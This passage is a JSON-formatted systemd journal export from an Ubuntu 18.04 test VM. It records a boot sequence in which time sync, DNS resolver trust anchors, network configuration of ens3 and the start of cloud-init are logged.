"SYSLOG_FACILITY" : "9", "CODE_FILE" : "../src/timesync/timesyncd-manager.c", "CODE_LINE" : "1070", "CODE_FUNC" : "manager_network_event_handler", "SYSLOG_IDENTIFIER" : "systemd-timesyncd", "MESSAGE" : "Network configuration changed, trying to establish connection.", "_PID" : "501", "_UID" : "62583", "_GID" : "62583", "_COMM" : "systemd-timesyn", "_EXE" : "/lib/systemd/systemd-timesyncd", "_CMDLINE" : "/lib/systemd/systemd-timesyncd", "_CAP_EFFECTIVE" : "2000000", "_SYSTEMD_CGROUP" : "/system.slice/systemd-timesyncd.service", "_SYSTEMD_UNIT" : "systemd-timesyncd.service", "_SYSTEMD_INVOCATION_ID" : "02dc978d5d9147908ffca7c0020b3270", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814402353" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=245;b=e2b08827b5804427b422c10c84f1567e;m=264e0a5;t=5bd16df28600c;x=2b63421ba744fd47", "__REALTIME_TIMESTAMP" : "1615280814448652", "__MONOTONIC_TIMESTAMP" : "40165541", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/resolve/resolved-dns-trust-anchor.c", "CODE_LINE" : "491", "CODE_FUNC" : "dns_trust_anchor_dump", "SYSLOG_IDENTIFIER" : "systemd-resolved", "MESSAGE" : "Positive Trust Anchors:", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_CAP_EFFECTIVE" : "2500", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814448547" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=246;b=e2b08827b5804427b422c10c84f1567e;m=264e25e;t=5bd16df2861c6;x=53e94fe147e04df4", "__REALTIME_TIMESTAMP" : "1615280814449094", "__MONOTONIC_TIMESTAMP" : "40165982", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/resolve/resolved-dns-trust-anchor.c", "CODE_FUNC" : "dns_trust_anchor_dump", "SYSLOG_IDENTIFIER" : "systemd-resolved", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_CAP_EFFECTIVE" : "2500", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "CODE_LINE" : "496", "MESSAGE" : ". IN DS 19036 8 2 49aac11d7b6f6446702e54a1607371607a1a41855200fd2ce1cdde32f24e8fb5", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814449087" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=247;b=e2b08827b5804427b422c10c84f1567e;m=264e2ca;t=5bd16df286231;x=b3656ad15fdd74e0", "__REALTIME_TIMESTAMP" : "1615280814449201", "__MONOTONIC_TIMESTAMP" : "40166090", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/resolve/resolved-dns-trust-anchor.c", "CODE_FUNC" : "dns_trust_anchor_dump", "SYSLOG_IDENTIFIER" : "systemd-resolved", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_CAP_EFFECTIVE" : "2500", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "CODE_LINE" : "496", "MESSAGE" : ". IN DS 20326 8 2 e06d44b80b8f1d39a95c0b0d7c65d08458e880409bbc683457104237c7f8ec8d", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814449197" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=248;b=e2b08827b5804427b422c10c84f1567e;m=264e354;t=5bd16df2862bc;x=dd13fe1df3b59488", "__REALTIME_TIMESTAMP" : "1615280814449340", "__MONOTONIC_TIMESTAMP" : "40166228", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/resolve/resolved-dns-trust-anchor.c", "CODE_FUNC" : "dns_trust_anchor_dump", "SYSLOG_IDENTIFIER" : "systemd-resolved", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_CAP_EFFECTIVE" : "2500", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "CODE_LINE" : "515", "MESSAGE" : "Negative trust anchors: 10.in-addr.arpa 16.172.in-addr.arpa 17.172.in-addr.arpa 18.172.in-addr.arpa 19.172.in-addr.arpa 20.172.in-addr.arpa 21.172.in-addr.arpa 22.172.in-addr.arpa 23.172.in-addr.arpa 24.172.in-addr.arpa 25.172.in-addr.arpa 26.172.in-addr.arpa 27.172.in-addr.arpa 28.172.in-addr.arpa 29.172.in-addr.arpa 30.172.in-addr.arpa 31.172.in-addr.arpa 168.192.in-addr.arpa d.f.ip6.arpa corp home internal intranet lan local private test", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814449320" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=249;b=e2b08827b5804427b422c10c84f1567e;m=264e894;t=5bd16df2867fb;x=4753c52001af8008", "__REALTIME_TIMESTAMP" : "1615280814450683", "__MONOTONIC_TIMESTAMP" : "40167572", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-resolved", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_CAP_EFFECTIVE" : "2500", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "CODE_FILE" : "../src/resolve/resolved-manager.c", "CODE_LINE" : "517", "CODE_FUNC" : "manager_watch_hostname", "MESSAGE" : "Using system hostname 'test-1'.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814450676" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24a;b=e2b08827b5804427b422c10c84f1567e;m=2650144;t=5bd16df2880ab;x=e7f248e70e6d207c", "__REALTIME_TIMESTAMP" : "1615280814457003", "__MONOTONIC_TIMESTAMP" : "40173892", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-resolved.service", "INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "MESSAGE" : "Started Network Name Resolution.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814452271" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24b;b=e2b08827b5804427b422c10c84f1567e;m=26501b2;t=5bd16df28811a;x=dd00ea5542cc278f", "__REALTIME_TIMESTAMP" : "1615280814457114", "__MONOTONIC_TIMESTAMP" : "40174002", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Host and Network Name Lookups.", "UNIT" : "nss-lookup.target", "INVOCATION_ID" : "6c96e169e38646ec879dc9c26874b07c", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814454559" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24c;b=e2b08827b5804427b422c10c84f1567e;m=26510fd;t=5bd16df289064;x=9308da645fc2b823", "__REALTIME_TIMESTAMP" : "1615280814461028", "__MONOTONIC_TIMESTAMP" : "40177917", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Network.", "UNIT" : "network.target", "INVOCATION_ID" : "f0292f15c43a4eef96deaed11fec60ec", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814459237" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24d;b=e2b08827b5804427b422c10c84f1567e;m=2766411;t=5bd16df39e377;x=db1c5e6390bcf691", "__REALTIME_TIMESTAMP" : "1615280815596407", "__MONOTONIC_TIMESTAMP" : "41313297", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "INTERFACE" : "ens3", "CODE_LINE" : "3163", "CODE_FUNC" : "link_ipv6ll_gained", "MESSAGE" : "ens3: Gained IPv6LL", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815596024" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24e;b=e2b08827b5804427b422c10c84f1567e;m=27666f4;t=5bd16df39e65c;x=23d4c70eda3aa2af", "__REALTIME_TIMESTAMP" : "1615280815597148", "__MONOTONIC_TIMESTAMP" : "41314036", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "INTERFACE" : "ens3", "CODE_LINE" : "741", "CODE_FUNC" : "link_enter_configured", "MESSAGE" : "ens3: Configured", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815596134" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24f;b=e2b08827b5804427b422c10c84f1567e;m=2768482;t=5bd16df3a03e9;x=44777783d090e933", "__REALTIME_TIMESTAMP" : "1615280815604713", "__MONOTONIC_TIMESTAMP" : "41321602", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "_SOURCE_MONOTONIC_TIMESTAMP" : "41321437", "MESSAGE" : "random: crng init done" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=250;b=e2b08827b5804427b422c10c84f1567e;m=27684fe;t=5bd16df3a0466;x=cb3c66b18efc86ff", "__REALTIME_TIMESTAMP" : "1615280815604838", "__MONOTONIC_TIMESTAMP" : "41321726", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "_SOURCE_MONOTONIC_TIMESTAMP" : "41321439", "MESSAGE" : "random: 7 urandom warning(s) missed due to ratelimiting" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=251;b=e2b08827b5804427b422c10c84f1567e;m=2768525;t=5bd16df3a048c;x=e3c199751aa14f5f", "__REALTIME_TIMESTAMP" : "1615280815604876", "__MONOTONIC_TIMESTAMP" : "41321765", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "9", "CODE_FILE" : "../src/timesync/timesyncd-manager.c", "CODE_LINE" : "1070", "CODE_FUNC" : "manager_network_event_handler", "SYSLOG_IDENTIFIER" : "systemd-timesyncd", "MESSAGE" : "Network configuration changed, trying to establish connection.", "_PID" : "501", "_UID" : "62583", "_GID" : "62583", "_COMM" : "systemd-timesyn", "_EXE" : "/lib/systemd/systemd-timesyncd", "_CMDLINE" : "/lib/systemd/systemd-timesyncd", "_CAP_EFFECTIVE" : "2000000", "_SYSTEMD_CGROUP" : "/system.slice/systemd-timesyncd.service", "_SYSTEMD_UNIT" : "systemd-timesyncd.service", "_SYSTEMD_INVOCATION_ID" : "02dc978d5d9147908ffca7c0020b3270", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815598271" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=252;b=e2b08827b5804427b422c10c84f1567e;m=27686ad;t=5bd16df3a0615;x=984b8385613f98c2", "__REALTIME_TIMESTAMP" : "1615280815605269", "__MONOTONIC_TIMESTAMP" : "41322157", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_CAP_EFFECTIVE" : "3fffffffff", "_HOSTNAME" : "test-1", "_COMM" : "systemd-network", "CODE_FILE" : "../src/network/wait-online/manager.c", "CODE_LINE" : "89", "CODE_FUNC" : "manager_all_configured", "SYSLOG_IDENTIFIER" : "systemd-networkd-wait-online", "MESSAGE" : "managing: ens3", "_PID" : "616", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd-wait-online.service", "_SYSTEMD_UNIT" : "systemd-networkd-wait-online.service", "_SYSTEMD_INVOCATION_ID" : "2f779d5a71cf4429aa193a78ff1c5862", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815598879" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=253;b=e2b08827b5804427b422c10c84f1567e;m=276899a;t=5bd16df3a0902;x=ce2869e8bb367c39", "__REALTIME_TIMESTAMP" : "1615280815606018", "__MONOTONIC_TIMESTAMP" : "41322906", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_CAP_EFFECTIVE" : "3fffffffff", "_HOSTNAME" : "test-1", "_COMM" : "systemd-network", "CODE_FILE" : "../src/network/wait-online/manager.c", "CODE_FUNC" : "manager_all_configured", "SYSLOG_IDENTIFIER" : "systemd-networkd-wait-online", "_PID" : "616", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd-wait-online.service", "_SYSTEMD_UNIT" : "systemd-networkd-wait-online.service", "_SYSTEMD_INVOCATION_ID" : "2f779d5a71cf4429aa193a78ff1c5862", "CODE_LINE" : "72", "MESSAGE" : "ignoring: lo", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815598960" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=254;b=e2b08827b5804427b422c10c84f1567e;m=27689fb;t=5bd16df3a0963;x=cad5aeff3f93fbd8", "__REALTIME_TIMESTAMP" : "1615280815606115", "__MONOTONIC_TIMESTAMP" : "41323003", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-networkd-wait-online.service", "INVOCATION_ID" : "2f779d5a71cf4429aa193a78ff1c5862", "MESSAGE" : "Started Wait for Network to be Configured.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815601818" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=255;b=e2b08827b5804427b422c10c84f1567e;m=276a90f;t=5bd16df3a2877;x=3f8d6df4f98e116a", "__REALTIME_TIMESTAMP" : "1615280815614071", "__MONOTONIC_TIMESTAMP" : "41330959", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Initial cloud-init job (metadata service crawler)...", "UNIT" : "cloud-init.service", "INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815610953" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=256;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=2f7facbcff3c248a", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "MESSAGE" : "Cloud-init v. 19.1-1-gbaa47854-0ubuntu1~18.04.1 running 'init' at Tue, 09 Mar 2021 09:06:56 +0000. Up 41.82 seconds.", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=257;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=8cc996d422496cc0", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +++++++++++++++++++++++++++++++++++++++Net device info+++++++++++++++++++++++++++++++++++++++" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=258;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=3af3631cbc0f5fe1", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +--------+------+------------------------------+---------------+--------+-------------------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=259;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=29b466862941ac8d", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | Device | Up | Address | Mask | Scope | Hw-Address |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25a;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=3af3631cbc0f5fe1", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : 